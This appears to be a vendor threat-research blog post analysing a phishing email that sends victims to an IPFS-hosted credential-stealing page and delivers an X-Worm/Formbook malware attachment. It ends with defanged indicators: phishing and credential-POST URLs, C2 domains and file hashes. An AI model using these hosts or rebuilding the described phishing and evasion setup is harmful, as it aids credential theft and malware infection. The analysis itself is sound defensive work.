Skip to main content

Phishing or Malware? Unpacking a Combo 2-in-1 Threat

|

0 min read

Get a Demo of Forcepoint Solutions

Security researchers at Forcepoint recently uncovered a particularly unusual sample that blurs the lines between a classic phishing scam and a malware attack. At first glance, it looked like an ordinary phishing email — but digging deeper revealed that it also contained a malicious attachment from the X-Worm/Formbook family. This kind of dual-threat delivery, where a phishing message also distributes malware, is rare and noteworthy.

Let’s break down what made this sample so interesting. 

The Email: A Classic Phish on the Surface

Fig. 1 - Email view

 

The subject line read:

  • Subject: Your mailbox is almost full [victim.email]@[domain].com
     

At first, everything about the email screamed “phishing.” The sender’s address was disguised in a deceptive format that looked something like:


This format gives the impression that the message came from a legitimate internal source when in reality it likely originated from a hijacked or spoofed email address.

The body of the message followed standard phishing tactics: a brief warning about a full mailbox and a big, urgent looking “Clear Storage” button prompting the user to take immediate action.

The Redirect: IPFS-Based Phishing Page

Clicking the button led the user to a free hosting platform via the following URL: 

  • hxxps://ipfs[.]io/ipfs/bafkreifs2nuxey2rbsqwuv5qt6xwnopg3hhailqnk2bpw52fmqitxmzuni#[email protected]

This redirect took the victim to a phishing page hosted on IPFS (InterPlanetary File System) - a decentralized file-sharing network increasingly exploited by threat actors due to its resilience against takedowns. Hosting malicious content on such platforms not only enhances persistence but also increases the likelihood of user interaction, as these services often appear familiar or trustworthy. This tactic reflects a broader trend anticipated in the Forcepoint X-Labs’ 2025 Future Insights report, which predicted that adversaries would increasingly exploit legitimate infrastructure to blend into normal traffic patterns and evade detection. 

Fig. 2 - Phishing page

 

Interestingly, the phishing page didn’t just attempt to steal credentials — it also tried to gather extra context about the victim. By including an external JavaScript file from geoplugin.net, the page was able to quietly capture information like the user’s geographic region, system details, and local date and time. GeoPlugin is a geolocation API that determines a user’s location based on their IP address, offering insights such as country, city, and even latitude and longitude. These small details may seem harmless, but in the hands of a phisher, they help craft a more convincing and personalized experience — making the scam feel more legitimate and increasing the chances that a victim will fall for it.

Fig. 3 - Geolocation JavaScript

 

Obfuscated Code

The phishing page’s content was obfuscated using JavaScript. A snippet of the code looked like this: 

script-image

After decoding, it became clear that the page was designed to steal credentials. The obfuscated script dynamically rendered a login form, and once credentials were entered, they were sent via a POST request to an attacker-controlled endpoint.

Fig. 4 - Code sample with POST request

 

The Attachment: Malware in Disguise

What set this phishing campaign apart, however, was the unrelated malicious attachment that came along with the email — a RAR archive. 

Although the attachment had no logical connection to the email’s content, once extracted and executed, it dropped malware from the X-Worm/Formbook family, known for:

  • Credential stealing
  • Keylogging
  • Persistence techniques
  • Anti-analysis features 

Malware Behavior Summary

The malware execution begins with a .NET-compiled loader that runs in a managed runtime environment. This loader is responsible for delivering and executing a second-stage payload, which is also a .NET executable. The consistent use of .NET across both stages indicates a streamlined delivery chain leveraging in-memory execution or embedded resources to evade detection.
In summary, the malware sample exhibited the following suspicious activities:

  • Anti-analysis: Used sleep delays, checked for debugging environments, and detected virtualization.
  • System modification: Added Windows Defender exclusions and created scheduled tasks for persistence.
  • Network communication: Attempted connections to external IPs, possibly for command-and-control (C2) communication or data exfiltration.
  • Code injection: Dropped and injected malicious payloads into legitimate system processes. 

Conclusion

This hybrid campaign underscores the evolving tactics of threat actors. By bundling phishing with malware delivery, attackers increase their chances of success — if the phishing lure doesn’t get you, the malicious attachment might.

Protection Statement:

Forcepoint customers are protected against this threat at the following stages of attack:

  • Stage 1 (Lure) – Emails are blocked by email security analytics.
  • Stage 2 (Delivery) – Emails and malicious attachments are identified and blocked by Forcepoint Email Security.
  • Stage 3 (Redirect) – Redirection URL within the email are identified and blocked.
  • Stage 6 (Command and Control / Call Home) – Communication attempts to C2 servers related to the phishing page and malware attachment are successfully blocked. 

IOCs:

IndicatorsDetails
From address

[email protected]

Phish URLs

.hxxps://ipfs[.]io/ipfs/bafkreifs2nuxey2rbsqwuv5qt6xwnopg3hhailqnk2bpw52fmqitxmzuni#email@address   

Post URLs

.hxxp://Jezzo[.]sbs/love/newpost[.]php

C2s

verism[.]xyz/x0tn/

rumbtap[.]site/gnwh/

ff87558[.]vip/582t/

elementzone[.]shop/w9tj/

beragame[.]biz/2c8x/

fun1995[.]net/wfuw/

instatv[.]shop/wx48/

top10-casino25[.]buzz/w300/

eternalethereum[.]xyz/d9jw/

computetools[.]xyz/1t1d/

bri[.]co[.]id/cx3e/

ezdecnight[.]info/ilbf/

hangten[.]tech/fnmj/

servisyeni[.]xyz/layp/

boldcatchpoint[.]shop/e49a/

nysche[.]tokyo/8q4x/

empero[.]fun/ccu2/

File hashes

29bec38ca9f41669986562d69bbfb30c46f09346 exe

f99e081031ba68bf5a0e1328df6574590516ec3a  rar

  • Pavlo Prodanchuk

    Pavlo Prodanchuk

    Pavlo Prodanchuk serves as a Security Researcher with the Forcepoint X-Labs Threat Research team. He focuses on detecting and analyzing web, email, and file-based cyberattacks. Pavlo is passionate about identifying emerging threats and developing proactive defenses to enhance security across digital environments.

    Read more articles by Pavlo Prodanchuk

X-Labs

Get insight, analysis & news straight to your inbox

To the Point

Cybersecurity

A Podcast covering latest trends and topics in the world of cybersecurity

Listen Now